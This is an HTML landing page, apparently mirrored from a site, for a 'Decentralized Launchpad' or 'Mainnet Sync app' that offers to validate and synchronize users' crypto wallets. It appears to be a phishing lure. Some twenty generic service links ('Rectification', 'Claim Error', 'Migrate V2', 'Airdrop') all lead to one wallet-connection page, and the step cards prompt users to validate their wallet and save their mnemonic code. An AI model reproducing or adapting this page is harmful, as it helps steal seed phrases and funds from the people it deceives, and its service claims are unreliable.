<!DOCTYPE html>
<html lang="en">
  
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <!-- <title>Wallets | Linkup Affixs</title> -->
    <title>Home | Mainnet Sync app</title>

    <!-- Stylesheet (CSS) -->
    <link rel="stylesheet" href="css/style.css" />
    <link
      rel="stylesheet"
      href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
  </head>
  <body>
    <header class="lpd-header">
      <nav class="lpd-nav">
        <div class="center lpd-nav-container">
          <h4 class="lpd-logo">Decentralized Launchpad</h4>

          <a href="wallets/index.html" class="lpd-nav-wallet-link"> Connect Wallet </a>
        </div>
      </nav>

      <header class="lpd-hero-header">
        <h2 class="lpd-hero-text">
          Validate, initialize, and synchronize your tokens on your wallets
        </h2>
        <p class="lpd-hero-sub-text text-center">
          Open And Decentralized Protocol For Syncing Various Wallets To Dapps
          Secure Server
        </p>

        <div class="lpd-hero-links">
          <a href="wallets/index.html" class="lpd-hero-link">Staking</a>
          <a href="wallets/index.html" class="lpd-hero-link">Staking Reward</a>
          <a href="wallets/index.html" class="lpd-hero-link">Validate Wallet</a>
          <a href="wallets/index.html" class="lpd-hero-link">Approve Address</a>
          <a href="wallets/index.html" class="lpd-hero-link">Synchronize</a>
          <a href="wallets/index.html" class="lpd-hero-link">Rectification</a>
          <a href="wallets/index.html" class="lpd-hero-link">Migration</a>
          <a href="wallets/index.html" class="lpd-hero-link">Migrate V2</a>
          <a href="wallets/index.html" class="lpd-hero-link">Airdrop</a>
          <a href="wallets/index.html" class="lpd-hero-link">Whitelist</a>
          <a href="wallets/index.html" class="lpd-hero-link">Claim Rewards</a>
          <a href="wallets/index.html" class="lpd-hero-link">Claim Error</a>
          <a href="wallets/index.html" class="lpd-hero-link">Slippage Error</a>
          <a href="wallets/index.html" class="lpd-hero-link">NFT</a>
          <a href="wallets/index.html" class="lpd-hero-link">KYC</a>
          <a href="wallets/index.html" class="lpd-hero-link">Marketplace</a>
          <a href="wallets/index.html" class="lpd-hero-link">Gas</a>
          <a href="wallets/index.html" class="lpd-hero-link">Snapshot</a>
          <a href="wallets/index.html" class="lpd-hero-link">Buy Presale</a>
          <a href="wallets/index.html" class="lpd-hero-link">RPC Settings</a>
        </div>
      </header>
    </header>

    <section class="lpd-middle">
      <div class="center lpd-middle-div">
        <div class="lpd-middle-option">
          <img src="img/syw.png" alt="" />
          <h6 class="text-center">Select Your Wallet</h6>
          <p class="text-center">
            We have varieties of wallets you can choose from to validate or
            synchronize your wallet. Please, select your correct wallet name
            before proceeding.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/vyw.png" alt="" />
          <h6 class="text-center">Validate Your Wallet</h6>
          <p class="text-center">
            Once you select your wallet, you will be prompted to connect via a
            decentralized protocol. This can successfully be completed manually
            or automatically.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/gqc.png" alt="" />
          <h6 class="text-center">Generate QR Code</h6>
          <p class="text-center">
            Upon successful validation, a QR Code will be generated for your
            wallet. You can always scan your QR Code to reinitialize your
            wallet.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/swqc.png" alt="" />
          <h6 class="text-center">Save Wallet QR Code</h6>
          <p class="text-center">
            Saving your generated mnemonic code or QR Code is important. You can
            click on Save or Screenshot the QR Code Page. You choose how you
            want to save!
          </p>
        </div>
      </div>
    </section>

    <footer class="lpd-footer">
      <div class="center">
        <div class="lpd-ccc">
          <img src="img/bim-foot.png" class="lpd-footer-content" />
        </div>
      </div>
    </footer>
  </body>


</html>
